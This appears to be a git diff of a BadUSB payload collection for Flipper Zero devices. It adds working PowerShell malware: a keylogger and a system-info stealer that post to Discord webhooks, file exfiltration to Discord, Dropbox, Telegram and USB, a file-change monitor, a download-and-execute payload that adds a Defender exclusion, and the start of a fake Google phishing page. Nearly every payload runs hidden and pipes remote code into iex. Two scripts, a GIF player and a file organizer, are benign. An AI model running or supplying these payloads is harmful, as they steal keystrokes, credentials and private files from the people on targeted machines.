$Value2 | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}}
$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw
$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime
$outpath = "$env:temp\systeminfo.txt"
"--------------------- SYSTEM INFORMATION for $env:COMPUTERNAME -----------------------`n" | Out-File -FilePath $outpath -Encoding ASCII
"General Info `n $infomessage" | Out-File -FilePath $outpath -Encoding ASCII -Append
"Network Info `n -----------------------------------------------------------------------`n$outssid" | Out-File -FilePath $outpath -Encoding ASCII -Append
"USB Info `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append
($COMDevices| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append
"`n" | Out-File -FilePath $outpath -Encoding ASCII -Append
"SOFTWARE INFO `n ======================================================================" | Out-File -FilePath $outpath -Encoding ASCII -Append
"Installed Software `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append
($software| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append
"Processes `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append
($process| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append
"Services `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append
($service| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append
"Drivers `n -----------------------------------------------------------------------`n$drivers" | Out-File -FilePath $outpath -Encoding ASCII -Append
"`n" | Out-File -FilePath $outpath -Encoding ASCII -Append
"HISTORY INFO `n ====================================================================== `n" | Out-File -FilePath $outpath -Encoding ASCII -Append
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append
($Value| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append
($Value2| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append
"Powershell History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append
($pshistory| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append
"Recent Files `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append
($RecentFiles | Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append
$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``System Information for $env:COMPUTERNAME`` :computer:"} | ConvertTo-Json
Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys
Sleep 1
$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = "$infomessage"} | ConvertTo-Json
Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys
curl.exe -F file1=@"$outpath" $hookurl
Sleep 1
Remove-Item -Path $outpath -force

20
Discord-Keylogger/Keylogger-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's Keyloggger to Discord Webhook.
REM Author: @beigeworm
REM Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_kl_to_dc | iex
ENTER

14
Discord-Keylogger/README.md Normal file
View File

@@ -0,0 +1,14 @@
<h2 align="center"> Keylogger To Discord Webhook </h2>
SYNOPSIS
This script gathers Keypress information and posts to a discord webhook address with the results only
when the keyboard is inactive for more than 10 seconds and only if keys were pressed before that.
USAGE
1. Input your credentials below
2. Run Script on target System
3. Check Discord for results

71
Discord-Keylogger/main.ps1 Normal file
View File

@@ -0,0 +1,71 @@
# Import DLL Definitions for keyboard inputs
$API = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
$API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru
# Add stopwatch for intellegent sending
$LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew()
$KeypressThreshold = [TimeSpan]::FromSeconds(10)
# Start a continuous loop
While ($true){
$keyPressed = $false
try{
# Start a loop that checks the time since last activity before message is sent
while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) {
# Start the loop with 30 ms delay between keystate check
Start-Sleep -Milliseconds 30
for ($asc = 8; $asc -le 254; $asc++){
# Get the key state. (is any key currently pressed)
$keyst = $API::GetAsyncKeyState($asc)
# If a key is pressed
if ($keyst -eq -32767) {
# Restart the inactivity timer
$keyPressed = $true
$LastKeypressTime.Restart()
$null = [console]::CapsLock
# Translate the keycode to a letter
$vtkey = $API::MapVirtualKey($asc, 3)
# Get the keyboard state and create stringbuilder
$kbst = New-Object Byte[] 256
$checkkbst = $API::GetKeyboardState($kbst)
$logchar = New-Object -TypeName System.Text.StringBuilder
# Define the key that was pressed
if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) {
# Check for non-character keys
$LString = $logchar.ToString()
if ($asc -eq 8) {$LString = "[BKSP]"}
if ($asc -eq 13) {$LString = "[ENT]"}
if ($asc -eq 27) {$LString = "[ESC]"}
# Add the key to sending variable
$send += $LString
}
}
}
}
}
finally{
If ($keyPressed) {
# Send the saved keys to a webhook
$escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
$timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss"
$escmsg = $timestamp+" : "+'`'+$escmsgsys+'`'
$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json
Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
#Remove log file and reset inactivity check
$send = ""
$keyPressed = $false
}
}
# reset stopwatch before restarting the loop
$LastKeypressTime.Restart()
Start-Sleep -Milliseconds 10
}

22
Download-and-Execute/Download-Execute.txt Normal file
View File

@@ -0,0 +1,22 @@
REM Title: Download-Execute from Run Prompt
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses the Run Prompt to download a file and run it.
REM Target: Windows 10
REM *SETUP*
REM replace FILE_URL_HERE with the url of your file to run.
REM some setup for dukie script.
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1;
REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit
CTRL-SHIFT ENTER
DELAY 3000
ALT y

11
Download-and-Execute/README.md Normal file
View File

@@ -0,0 +1,11 @@
<h2 align="center"> Download and Execute exe files </h2>
SYNOPSIS
Uses the Run Prompt to download a file and run it.
USAGE
replace FILE_URL_HERE with the url of your file to run.
Run script on target Windows system.

19
Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's Exfiltrate files to Discord
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a Discord Webhook.
REM Target: Windows 10
REM *SETUP*
REM replace WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm https://is.gd/bw_ex_to_dc | iex
ENTER

12
Exfiltrate-to-Discord/README.md Normal file
View File

@@ -0,0 +1,12 @@
<h2 align="center"> Exfiltrate Files to Discord </h2>
SYNOPSIS
This script searches the user folders for specific filetypes to upload to Discord zipped.
SETUP
Create a webhook in a discord server channel settings.
Replace WEBHOOK_HERE with your webhook.

53
Exfiltrate-to-Discord/main.ps1 Normal file
View File

@@ -0,0 +1,53 @@
$hookurl = "$dc"
Function Exfiltrate {
param ([string[]]$FileType,[string[]]$Path)
$maxZipFileSize = 25MB
$currentZipSize = 0
$index = 1
$zipFilePath ="$env:temp/Loot$index.zip"
If($Path -ne $null){
$foldersToSearch = "$env:USERPROFILE\"+$Path
}else{
$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")
}
If($FileType -ne $null){
$fileExtensions = "*."+$FileType
}else {
$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")
}
Add-Type -AssemblyName System.IO.Compression.FileSystem
$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
foreach ($folder in $foldersToSearch) {
foreach ($extension in $fileExtensions) {
$files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse
foreach ($file in $files) {
$fileSize = $file.Length
if ($currentZipSize + $fileSize -gt $maxZipFileSize) {
$zipArchive.Dispose()
$currentZipSize = 0
curl.exe -F file1=@"$zipFilePath" $hookurl
Remove-Item -Path $zipFilePath -Force
Sleep 1
$index++
$zipFilePath ="$env:temp/Loot$index.zip"
$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
}
$entryName = $file.FullName.Substring($folder.Length + 1)
[System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName)
$currentZipSize += $fileSize
}
}
}
$zipArchive.Dispose()
curl.exe -F file1=@"$zipFilePath" $hookurl
Remove-Item -Path $zipFilePath -Force
Write-Output "$env:COMPUTERNAME : Exfiltration Complete."
}
Exfiltrate

19
Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's Exfiltrate files to Dropbox
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
REM Target: Windows 10
REM *SETUP*
REM replace DROPBOX_TOKEN with your Dropbox Token.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Dropbox/main.ps1 | iex
ENTER

19
Exfiltrate-to-Dropbox/README.md Normal file
View File

@@ -0,0 +1,19 @@
<h2 align="center"> Exfiltrate Files to Dropbox </h2>
SYNOPSIS
Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account.
SETUP
make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app)
generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE.
USAGE
1. Input your credentials below
2. Run Script on target System
3. Check Discord for results
#>

31
Exfiltrate-to-Dropbox/main.ps1 Normal file
View File

@@ -0,0 +1,31 @@
$accessToken = "$db"
$localFolderPath = "$env:USERPROFILE"
$computerName = "$env:COMPUTERNAME"
$computerNameAsString = $computerName.ToString()
$dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2"
$dropboxFolderPath = $computerName.ToString()
$dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload"
$headers = @{
"Authorization" = "Bearer $accessToken"
"Content-Type" = "application/octet-stream"
}
$body = @{
"path" = "/$computerName"
"autorename" = $true
} | ConvertTo-Json
$files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse
foreach ($file in $files) {
$relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\')
$dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/')
$headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}"
try {
$fileBytes = [System.IO.File]::ReadAllBytes($file.FullName)
$response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes
}
catch {}
}

19
Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's Exfiltrate files to Telegram
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
REM Target: Windows 10
REM *SETUP*
REM replace TELEGRAM_TOKEN with your Telegram Token.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Telegram/main.ps1 | iex
ENTER

14
Exfiltrate-to-Telegram/README.md Normal file
View File

@@ -0,0 +1,14 @@
<h2 align="center"> Exfiltrate Files to Telegram </h2>
SYNOPSIS
This script connects target computer with a telegram chat to upload certain files to telegram .
SETUP INSTRUCTIONS
1. visit https://t.me/botfather and make a bot.
2. add bot api to script.
3. search for bot in top left box in telegram and start a chat then type /start.
4. Replace TELEGRAM_TOKEN with your token
5. Run Script on target System

68
Exfiltrate-to-Telegram/main.ps1 Normal file
View File

@@ -0,0 +1,68 @@
$Token = "$tg"
$URL='https://api.telegram.org/bot{0}' -f $Token
while($chatID.length -eq 0){
$updates = Invoke-RestMethod -Uri ($url + "/getUpdates")
if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1]
if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}}
Sleep 10
}
Function Exfiltrate {
param ([string[]]$FileType,[string[]]$Path)
$maxZipFileSize = 50MB
$currentZipSize = 0
$index = 1
$zipFilePath ="$env:temp/Loot$index.zip"
$MessageToSend = New-Object psobject
$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID
$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force
irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json"
If($Path -ne $null){
$foldersToSearch = "$env:USERPROFILE\"+$Path
}else{
$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")
}
If($FileType -ne $null){
$fileExtensions = "*."+$FileType
}else {
$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")
}
Add-Type -AssemblyName System.IO.Compression.FileSystem
$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
$escmsg = "Files from : "+$env:COMPUTERNAME
foreach ($folder in $foldersToSearch) {
foreach ($extension in $fileExtensions) {
$files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse
foreach ($file in $files) {
$fileSize = $file.Length
if ($currentZipSize + $fileSize -gt $maxZipFileSize) {
$zipArchive.Dispose()
$currentZipSize = 0
curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument"
Remove-Item -Path $zipFilePath -Force
Sleep 1
$index++
$zipFilePath ="$env:temp/Loot$index.zip"
$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
}
$entryName = $file.FullName.Substring($folder.Length + 1)
[System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName)
$currentZipSize += $fileSize
}
}
}
$zipArchive.Dispose()
curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument"
Remove-Item -Path $zipFilePath -Force
Write-Output "$env:COMPUTERNAME : Exfiltration Complete."
}
# Define What you want to search for (examples at the top)
Exfiltrate -Path documents -FileType log

16
Exfiltrate-to-USB/Exfiltrate-to-USB.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's Exfiltrate files USB Drive
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to newly connected USB drive.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex
ENTER

15
Exfiltrate-to-USB/README.md Normal file
View File

@@ -0,0 +1,15 @@
<h2 align="center"> Exfiltrate Files to USB </h2>
SYNOPSIS
Waits for a new USB Storage device to be connected and then copies many user files to that USB drive.
USAGE
1. Run the script.
2. Choose if you want to hide the console window (silent mode)
3. Connect a USB Drive to the computer
4. Copying files will automatically begin to the newly connected drive
5. 'Completed' message will appear when finished (hidden mode only)

78
Exfiltrate-to-USB/main.ps1 Normal file
View File

@@ -0,0 +1,78 @@
[Console]::BackgroundColor = "Black"
[Console]::SetWindowSize(57, 5)
[Console]::Title = "Exfiltration"
Clear-Host
$hidden = Read-Host "Would you like to hide this console window? (Y/N)"
$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 }
$count = $removableDrives.count
$i = 10
While ($true){
cls
Write-Host "Connect a Device.. ($i)" -ForegroundColor Yellow
$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 }
sleep 1
if (!($count -eq $removableDrives.count)){
Write-Host "USB Drive Connected!" -ForegroundColor Green
break
}
$i--
if ($i -eq 0 ){
Write-Host "Timeout! Exiting" -ForegroundColor Red
sleep 1
exit
}
}
[Console]::SetWindowSize(80, 30)
$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1
$driveLetter = $drive.DeviceID
Write-Host "Loot Drive Set To : $driveLetter/" -ForegroundColor Green
$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")
$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")
$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot"
if (-not (Test-Path -Path $destinationPath)) {
New-Item -ItemType Directory -Path $destinationPath -Force
Write-Host "New Folder Created : $destinationPath" -ForegroundColor Green
}
If ($hidden -eq 'y'){
Write-Host "Hiding the Window.." -ForegroundColor Red
sleep 1
$Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
$Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
$hwnd = (Get-Process -PID $pid).MainWindowHandle
if($hwnd -ne [System.IntPtr]::Zero){
$Type::ShowWindowAsync($hwnd, 0)
}
else{
$Host.UI.RawUI.WindowTitle = 'hideme'
$Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' })
$hwnd = $Proc.MainWindowHandle
$Type::ShowWindowAsync($hwnd, 0)
}
}
foreach ($folder in $foldersToSearch) {
Write-Host "Searching in $folder" -ForegroundColor Yellow
foreach ($extension in $fileExtensions) {
$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File
foreach ($file in $files) {
$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name
Write-Host "Copying $($file.FullName) to $($destinationFile)" -ForegroundColor Gray
Copy-Item -Path $file.FullName -Destination $destinationFile -Force
}
}
}
If ($hidden -eq 'y'){
(New-Object -ComObject Wscript.Shell).Popup("File Exfiltration Complete",5,"Exfiltration",0x0)
}
else{
Write-Host "File Exfiltration Complete" -ForegroundColor Green
}

20
File-Monitor-to-Discord/File-Changes-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's monitor file changes to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex
ENTER

10
File-Monitor-to-Discord/README.md Normal file
View File

@@ -0,0 +1,10 @@
<h2 align="center"> Filesystem Monitor to discord </h2>
SYNOPSIS
This script gathers information about any changes to any files in the "%USERPROFILE% folder".
USAGE
2. Run Script on target System
3. Check temp folder for results

35
File-Monitor-to-Discord/main.ps1 Normal file
View File

@@ -0,0 +1,35 @@
$whuri = "$dc"
$watcher = New-Object System.IO.FileSystemWatcher -Property @{
Path = $env:USERPROFILE + '\'
}
$watcher.NotifyFilter = [System.IO.NotifyFilters]::FileName -bor `
[System.IO.NotifyFilters]::LastWrite -bor `
[System.IO.NotifyFilters]::DirectoryName
$action = {
$event = $EventArgs
$path = $event.FullPath
$changeType = $event.ChangeType
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
$msgsys = "[$timestamp] File $changeType > $path"
$escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json
Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys
}
Register-ObjectEvent -InputObject $watcher -EventName Created -Action $action
Register-ObjectEvent -InputObject $watcher -EventName Deleted -Action $action
Register-ObjectEvent -InputObject $watcher -EventName Changed -Action $action
$watcher.EnableRaisingEvents = $true
while ($true) {
Start-Sleep -Milliseconds 500
}
Unregister-Event -InputObject $watcher -EventName Created -Action $action
Unregister-Event -InputObject $watcher -EventName Deleted -Action $action
Unregister-Event -InputObject $watcher -EventName Changed -Action $action

16
Filetype-Organizer/Filetype-Organizer.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: Filetype Organizer
REM Author: @beigeworm
REM Description: This script searches the users folder for any files with a specific filetype and copies them to the user folder.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C cd $env:USERPROFILE ;irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Filetype-Organizer/main.ps1 | iex
ENTER

11
Filetype-Organizer/README.md Normal file
View File

@@ -0,0 +1,11 @@
<h2 align="center"> Search Folders For Filetypes </h2>
SYNOPSIS
Searches User folder for any files with specific filetype and copies them.
USAGE
1. Run Script.
2. follow instructions in the console.

64
Filetype-Organizer/main.ps1 Normal file
View File

@@ -0,0 +1,64 @@
$Host.UI.RawUI.BackgroundColor = "Black"
Clear-Host
$width = 88
$height = 30
[Console]::SetWindowSize($width, $height)
$windowTitle = " BeigeTools | Filetype Organizer"
[Console]::Title = $windowTitle
Write-Host "=======================================================================================" -ForegroundColor Green
Write-Host "============================= BeigeTools | Filetype Organizer =================================" -ForegroundColor Green
Write-Host "=======================================================================================`n" -ForegroundColor Green
Write-Host "More info at : https://github.com/beigeworm" -ForegroundColor DarkGray
Write-Host "Starts a GUI window to select a folder, then search for every file with a selected filetype and output to respective named files in the root folder.`n"
# Get the directory of the script
$scriptDirectory = Split-Path -Parent $MyInvocation.MyCommand.Definition
# Prompt user for file extensions
$fileExtensions = Read-Host "Enter file extensions separated by commas (e.g., jpg,mp4,png)"
# Convert the input into an array
$fileExtensionsArray = $fileExtensions -split ','
# Prompt user for folder to search recursively
$folderPath = Read-Host "Enter the folder path to search recursively"
# Prompt user to choose between move or copy
$operation = Read-Host "Enter 'M' to move files, 'C' to copy files"
# Validate the user input for the operation
if ($operation -ne 'M' -and $operation -ne 'C') {
Write-Host "Invalid operation. Please enter 'M' for move or 'C' for copy."
exit
}
# Create output folders in the script directory
foreach ($extension in $fileExtensionsArray) {
$folderName = $extension.Trim()
$folderPathForExtension = Join-Path $scriptDirectory $folderName
New-Item -ItemType Directory -Path $folderPathForExtension -Force
}
# Search for files and move/copy to appropriate folders
foreach ($extension in $fileExtensionsArray) {
$files = Get-ChildItem -Path $folderPath -Recurse -Include "*.$extension"
foreach ($file in $files) {
$destinationFolder = Join-Path $scriptDirectory $extension.Trim()
if ($operation -eq 'M') {
$ind = $file.FullName
Move-Item $file.FullName -Destination $destinationFolder -Force
Write-Host "Moved : $ind"
} elseif ($operation -eq 'C') {
$ind = $file.FullName
Copy-Item $file.FullName -Destination $destinationFolder -Force
Write-Host "Copied : $ind"
}
}
}
Write-Host "Operation Complete." -ForegroundColor Green
pause

16
GIF-Player/Gif-Player.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's GIF Player.
REM Author: @beigeworm
REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/GIF-Player/main.ps1 | iex
ENTER

10
GIF-Player/README.md Normal file
View File

@@ -0,0 +1,10 @@
<h2 align="center"> GIF Player in Powershell </h2>
SYNOPSIS
This Script downloads a GIF from Giphy and plays it in a GUI window.
USAGE
1. Run this script in powershell

45
GIF-Player/main.ps1 Normal file
View File

@@ -0,0 +1,45 @@
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
[System.Windows.Forms.Application]::EnableVisualStyles()
$url = "https://media3.giphy.com/media/tJqyalvo9ahykfykAj/giphy.gif?ep=v1_gifs_search" # example GIF (replace with your own link)
$gifPath = "$env:temp/g.gif"
iwr -Uri $url -OutFile $gifPath
$ErrorActionPreference = 'Stop'
function Play-Gif {
param(
[string]$GifPath
)
$form = New-Object System.Windows.Forms.Form
$pictureBox = New-Object System.Windows.Forms.PictureBox
$timer = New-Object System.Windows.Forms.Timer
$form.Text = "GIF Player"
$form.Size = New-Object System.Drawing.Size(490, 300)
$form.StartPosition = 'CenterScreen'
$form.Topmost = $true
$pictureBox.Size = $form.Size
$pictureBox.Image = [System.Drawing.Image]::FromFile($GifPath)
$timer.Interval = 50 # Adjust the interval as needed for desired animation speed
$timer.Add_Tick({
$pictureBox.Image.SelectActiveFrame([System.Drawing.Imaging.FrameDimension]::Time, $timer.Tag)
$pictureBox.Refresh()
$timer.Tag = ($timer.Tag + 1) % $pictureBox.Image.GetFrameCount([System.Drawing.Imaging.FrameDimension]::Time)
})
$timer.Tag = 0
$form.Controls.Add($pictureBox)
$form.Add_Shown({ $timer.Start() })
$form.ShowDialog()
}
Play-Gif -GifPath $gifPath
sleep 1
Remove-Item $gifPath

20
Google-Phishing/Google-Phish-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's Fake Google Phishing page to Discord Webhook.
REM Author: @beigeworm
REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_gp_to_dc | iex
ENTER

11
Google-Phishing/README.md Normal file
View File

@@ -0,0 +1,11 @@
<h2 align="center"> Google Sign in to Discord </h2>
SYNOPSIS
Uses Powershell and HTML to create a fake google login page which catches login credentials and sends them to a webhook.
USAGE
1. Replace YOUR_WEBBHOOK_HERE with your webhook
2. Run script on target system.

274
Google-Phishing/main.ps1 Normal file
View File

@@ -0,0 +1,274 @@
#========================================== WINDOW ONE (SETUP) =====================================================
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
[System.Windows.Forms.Application]::EnableVisualStyles()
